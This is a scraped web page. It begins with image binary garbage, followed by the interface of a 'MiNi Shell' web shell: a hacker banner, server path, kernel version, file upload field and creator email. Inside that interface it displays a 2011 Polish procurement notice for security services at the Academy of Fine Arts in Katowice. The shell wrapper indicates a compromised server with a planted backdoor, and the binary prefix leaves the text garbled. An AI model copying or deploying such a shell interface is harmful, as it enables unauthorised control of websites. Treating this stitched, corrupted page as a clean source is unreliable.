JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/42026-N-2011.html

<p class="kh_header"><b>Katowice: Usługi ochrony osób i mienia w Akademii Sztuk Pięknych</b><br>
<b>Numer ogłoszenia: 42026 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych w Katowicach , ul. Raciborska 37, 40-074 Katowice, woj. śląskie, tel. 032 2597408 w. 24, 3505061, faks 032 2516989, 259 7408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony osób i mienia w Akademii Sztuk Pięknych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi ochrony osób i mienia  w budynku Akademii Sztuk Pięknych położonych przy ul.raciborskiej 37 oraz ul.Koszarowej 19, szczegółowy opis w załączniku nr 1 do SIWZ

Usługi ochrony osób i mienia w galerii  Rondo Sztuki  znajdujacej się w obiekcie Kopuła  nad Rondem w katowicach, szczegółowy opis w załaczniku nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Usługi ochrony osób i mienia  w budynku Akademii Sztuk Pięknych połozonyvh przy ul.raciborskiej 37 oraz ul.Koszarowej 19, szczegółowy opis w załączniku nr 1 do SIWZ   -             50% wartości  zamówienia
    
Usługi ochrony osób i mienia w galerii  Rondo Sztuki  znajdujacej się w obiekcie Kopuła  nad Rondem w katowicach, szczegółowy opis w załaczniku nr 1 do SIWZ    -           50% wartosci zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości : 10 000,00 zł
 Wadium należy wnieść przed upływem terminu składania ofert.
 Wadium wniesione w innej formie niż  pieniężna należy złożyć w formie oryginału w Dziale Finansowo-Księgowym Zamawiającego na parterze budynku przy ul. Raciborskiej 37 w Katowicach, kserokopię potwierdzoną za zgodność oryginałem
należy dołączyć do oferty. Gwarancja zapłaty wadium powinna być bezwarunkowa i      płatna  na pierwsze żądanie w przypadkach  określonych w  pkt.11.7, 11.8   siwz.
 Wadium może być wnoszone w jednej lub kilku następujących formach:
           pieniądzu: przelewem na rachunek bankowy Zamawiającego: ING Bank Śląsk                                                                                               
              O/ Katowice  84 1050 1214 1000 0007 0000 7826  -za datę złożenia wadium w tej 
              formie przyjmuje się datę wpływu środków  na rachunek Zamawiającego;
           poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
           gwarancjach bankowych;
           gwarancjach ubezpieczeniowych
           poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2
               ustawy z dnia 9 listopada 2000 r  o utworzeniu Polskiej  Agencji Rozwoju 
              Przedsiębiorczości ( Dz. U. Nr 109, poz.1158, z późn. zm.)
  Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze       oferty najkorzystniejszej lub unieważnieniu  postępowania, z wyjątkiem wykonawcy,    którego oferta  została wybrana  jako najkorzystniejsza, z zastrzeżeniem ust. 4a art.46 ustawy  Prawo  zamówień publicznych. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający  
         zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia  publicznego  
         oraz   wniesieniu zabezpieczenia należytego wykonania umowy.
 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca którego oferta  
       została wybrana: 
            odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
              określonych w ofercie;
             nie wniósł  wymaganego zabezpieczenia należytego wykonania umowy;
            zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
              przyczyn  leżących po stronie wykonawcy.
   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nie leżących  po  jego  stronie  ( art.46 ust.4a ustawy -Prawo zamówień publicznych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1      O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
           dotyczące :
a)	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	Posiadania wiedzy i doświadczenia,
c)	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d)	Sytuacji ekonomicznej i finansowej.

Określone w ogłoszeniu o zamówieniu i niniejszej SIWZ.

6.2     Wykonawcy ubiegający się o udzielenie zamówienia muszą złożyć:
           oświadczenie o spełnianiu warunków udziału w postępowaniu (wg wzoru określonego w załączniku nr 2 do siwz), a ponadto wykazać spełnienie warunków określonych w pkt 6.1 w następujący sposób : 
L. p:	Opis sposobu oceny spełniania warunków	Dokumenty potwierdzające spełnianie warunków udziału               w postępowaniu
1.		Zamawiający uzna, że Wykonawca spełnia warunki w zakresie posiadania uprawnień do wykonywania działalności w zakresie ochrony osób i mienia, jeżeli wykaże, iż posiada aktualną:
- koncesję zezwalającą na prowadzenie  przez Wykonawcę usług ochrony osób 
i mienia w zakresie ochrony fizycznej wydaną przez właściwego ministra do spraw wewnętrznych.
W przypadku, gdy Wykonawca powierza wykonanie zamówienia podwykonawcom:
  winien wskazać w ofercie, jaką cześć     zamówienia im powierza; podwykonawca musi także wykazać się posiadaniem aktualnej koncesji na prowadzenie usług ochrony osób i mienia realizowanej 
w formie bezpośredniej ochrony fizycznej, wydanej przez właściwego ministra do spraw wewnętrznych.	1. Aktualna koncesja na prowadzenie usług ochrony osób i mienia 
realizowanej w formie bezpośredniej ochrony fizycznej wydaną przez właściwego ministra do spraw wewnętrznych. 
2.	Zamawiający uzna, iż Wykonawca posiada konieczną do wykonania zamówienia wiedzę i doświadczenie, gdy: 
- wykaże, iż należycie wykonał lub wykonuje                    w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
3 usługi ochrony osób i mienia 
w zakresie ochrony fizycznej 
o wartości co najmniej 200.000 PLN każda z nich 
 	1. Wykaz wykonanych lub wykonywanych usług 
w okresie ostatnich 3 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, potwierdzający należyte wykonanie lub wykonywanie, co najmniej 3 usług ochrony mienia w zakresie ochrony fizycznej o wartości, co najmniej 200.000 PLN każde z nich.
Wykaz winien zostać dołączony do oferty  na druku lub wg druku stanowiącego  załącznik nr 6 do siwz. 
2. Referencje i/lub opinie/ lub inne dokumenty potwierdzające należyte wykonanie lub wykonywanie usług wymienionych przez Wykonawcę 
w wykazie, o którym mowa wyżej, a dla usług ujętych w warunku wymaganymi bezwzględnie. 
Jeżeli Wykonawca polega na wiedzy 
i doświadczeniu innych podmiotów - w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
3.	Zamawiający uzna, iż Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, iż :
- dysponuje, co najmniej:
  7 osobami, które będą bezpośrednio        wykonywały usługi ochrony mienia.   1 osobą, posiadającą licencję pracownika ochrony fizycznej pierwszego stopnia, która będzie nadzorowała i kontrolowała  pracowników ochrony fizycznej.
	1.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w tym odpowiedzialnych za:
- świadczenie usług ochrony mienia w budynkach Akademii oraz 
- nadzorowanie osób wykonujących bezpośrednio usługi ochrony osób i mienia.
z Oświadczeniem, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. 
Wg wzoru stanowiącego załącznik nr  7 do siwz.
Wykaz powinien zawierać informację dot. kwalifikacji zawodowych  osób 
w nim wymienionych, doświadczenia 
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
Jeżeli Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów - w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada konieczną do wykonania zamówienia wiedzę i doświadczenie, gdy: 
- wykaże, iż należycie wykonał lub wykonuje                    w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
3 usługi ochrony osób i mienia 
w zakresie ochrony fizycznej 
o wartości co najmniej 200.000 PLN każda z nich</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, iż :
- dysponuje, co najmniej:
  7 osobami, które będą bezpośrednio        wykonywały usługi ochrony mienia. 
  1 osobą, posiadającą licencję pracownika ochrony fizycznej pierwszego stopnia, która będzie nadzorowała i kontrolowała  pracowników ochrony fizycznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">.WYMAGANIA ZAMAWIAJĄCEGO:
 Zamawiający wymaga, aby Wykonawca dołączył do oferty:	zaakceptowany- podpisany    Szczegółowy opis przedmiotu  zamówienia
 stanowiący   załącznik nr 1 do specyfikacji istotnych warunków zamówienia.	Sposób wyliczenia - kalkulacji stawki za 1 rb/h podanej w ofercie. Wysokość stawki musi być zgodna z obowiązującymi przepisami, w szczególności dot. minimalnego wynagrodzenia za pracę. 
	Dowód wniesienia wadium.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>9.WYMAGANIA ZAMAWIAJĄCEGO:
 Zamawiający wymaga, aby Wykonawca dołączył do oferty:	zaakceptowany- podpisany   Szczegółowy opis przedmiotu  zamówienia 
 stanowiący   załącznik nr 1 do specyfikacji istotnych warunków zamówienia.	Sposób wyliczenia - kalkulacji stawki za 1 rb/h podanej w ofercie. Wysokość stawki musi być zgodna z obowiązującymi przepisami, w szczególności dot. minimalnego wynagrodzenia za pracę. 
	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.ISTOTNE POSTANOWIENIA UMOWY:
Istotne postanowienia umowy określa wzór umowy stanowiący załącznik do niniejszej Specyfikacji.
 Zamawiający przewiduje możliwość dokonania istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w zakresie:
a)	wysokości wynagrodzenia w przypadku zmiany stawki podatku VAT.
b)	osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały minimum takie same kwalifikacje jak osoby wskazane w ofercie;
c)	podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą, pod warunkiem, iż wykaże posiadanie uprawnień do prowadzenia działalności objętych zamówieniem,
d)	zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy:
-	konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest rozwiązaniem umów o pracę z pracownikami, która uniemożliwia realizację prac przez Wykonawcę,
-	wprowadzenie podwykonawcy zapewni lepszą realizację danej części zamówienia,
  19.3 Warunkiem dokonania zmian w umowie, o których mowa wyżej jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych w Katowicach ul.Raciborska 37 pok.100.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2011 godzina 10:00, miejsce: Akademia Sztuk Pięknych w Katowicach ul.Raciborska 37 pok.100.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com